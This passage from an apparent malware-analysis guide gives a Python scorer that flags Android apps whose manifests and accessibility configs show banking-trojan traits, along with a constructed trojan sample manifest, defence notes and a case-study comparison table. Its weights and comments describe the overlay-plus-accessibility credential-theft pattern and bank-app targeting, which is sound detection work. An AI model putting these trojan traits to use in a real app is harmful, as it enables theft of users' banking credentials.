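    "android.permission.REQUEST_INSTALL_PACKAGES": 2,  # dropper stage
    "android.permission.QUERY_ALL_PACKAGES": 1,        # enumerate installed bank apps
}
BINDING_WEIGHTS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": 4,
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE": 2,
    "android.permission.BIND_DEVICE_ADMIN": 2,
}
OVERLAY = "android.permission.SYSTEM_ALERT_WINDOW"
ACCESSIBILITY = "android.permission.BIND_ACCESSIBILITY_SERVICE"


def score_manifest(manifest_xml: str) -> tuple[int, list[str]]:
    """Score declared permissions and the permissions services are bound with."""
    root = ET.fromstring(manifest_xml)
    score, findings = 0, []
    perms = {p.get(NS + "name") for p in root.iter("uses-permission")}
    for name in sorted(p for p in perms if p):
        if PERMISSION_WEIGHTS.get(name, 0):
            score += PERMISSION_WEIGHTS[name]
            findings.append(f"permission {name}")
    bindings = {s.get(NS + "permission") for s in root.iter("service")}
    for name in sorted(b for b in bindings if b):
        if BINDING_WEIGHTS.get(name, 0):
            score += BINDING_WEIGHTS[name]
            findings.append(f"service bound by {name}")
    # Overlay plus accessibility is the classic credential-theft pairing
    if OVERLAY in perms and ACCESSIBILITY in bindings:
        score += 5
        findings.append("overlay + accessibility combination")
    return score, findings


def score_accessibility_config(config_xml: str) -> tuple[int, list[str]]:
    """Score the service's accessibility_config.xml: gesture injection and
    window-content retrieval aimed at an explicit list of packages."""
    root = ET.fromstring(config_xml)
    score, findings = 0, []
    if root.get(NS + "canPerformGestures") == "true":
        score, findings = score + 3, findings + ["canPerformGestures"]
    if root.get(NS + "canRetrieveWindowContent") == "true":
        score, findings = score + 2, findings + ["canRetrieveWindowContent"]
    targets = [p for p in (root.get(NS + "packageNames") or "").split(",") if p]
    if targets:
        score, findings = score + 2, findings + [f"targets {len(targets)} named packages"]
    return score, findings


def is_suspicious(manifest_xml: str, config_xml: str = "", threshold: int = 10) -> bool:
    total = score_manifest(manifest_xml)[0]
    if config_xml:
        total += score_accessibility_config(config_xml)[0]
    return total >= threshold


# Constructed samples modelled on the manifest and config discussed above
TROJAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.cleaner.boost.android">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <application android:label="Cleaner">
        <service android:name=".AccessibilityServiceImpl"
                 android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
        </service>
    </application>
</manifest>"""
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Notes"/>
</manifest>"""
ACCESSIBILITY_CONFIG = """<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:accessibilityEventTypes="typeWindowStateChanged|typeViewClicked|typeViewTextChanged"
    android:canRetrieveWindowContent="true"
    android:canPerformGestures="true"
    android:packageNames="com.bank1.app,com.bank2.mobile"/>"""

if __name__ == "__main__":
    print(score_manifest(TROJAN_MANIFEST), score_accessibility_config(ACCESSIBILITY_CONFIG))
    print(is_suspicious(TROJAN_MANIFEST, ACCESSIBILITY_CONFIG), is_suspicious(BENIGN_MANIFEST))
```

Feed it the decoded AndroidManifest.xml (apktool or aapt2 output) and the referenced res/xml file; legitimate accessibility tools will also score on the config, which is why the manifest-side overlay and SMS weights matter for separating them from trojans.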

Analysis Decisions Under Uncertainty

Banking trojans increasingly use legitimate infrastructure (Firebase, Discord) and code similarity obfuscation (string encryption, control flow flattening). Effective analysis requires:

  • Dynamic instrumentation: Frida hooks on AccessibilityService.onAccessibilityEvent()
  • Device farm testing: Real device behavior vs. emulator detection evasion
  • Network traffic timing analysis: C2 polling jitter (15-60 minutes) vs. user behavior patterns

Defense Lessons

  • Accessibility service restrictions: Android 13's restricted settings block sideloaded apps from enabling accessibility services without an extra user step, and Android 14 adds the android:accessibilityDataSensitive view attribute so that sensitive fields are hidden from services that are not accessibility tools
  • Runtime application self-protection (RASP): Anti-overlay, anti-injection SDKs
  • Transaction verification: Out-of-band confirmation with behavioral biometrics

Cross-Cutting Analytical Framework

These case studies illustrate persistent challenges in malware analysis:

| Challenge | Pegasus | SUNBURST | NotPetya | Android Trojan |
|-----------|---------|----------|----------|----------------|
| Attribution confidence | High for the vendor (NSO); operator attribution rests on infrastructure and targeting | Low at disclosure (UNC2452); high after US government attribution to SVR | High (strategic context, later indictments) | Low (criminal service model, shared code) |
| Detection evasion | Zero-click delivery, non-persistent in-memory implant | Signed supply chain update, dormancy, DNS-gated C2 | Wiper posing as ransomware | Legitimate infrastructure abuse |
| Key evidence volatility | Encrypted device, implant lost on reboot | In-memory BEACON stage | MBR and MFT overwritten | Accessibility event stream |

The analyst's imperative remains: preserve evidence systematically, question initial classification hypotheses, and synthesize technical artifacts with operational context—recognizing that uncertainty is inherent, but actionable intelligence emerges from rigorous methodology.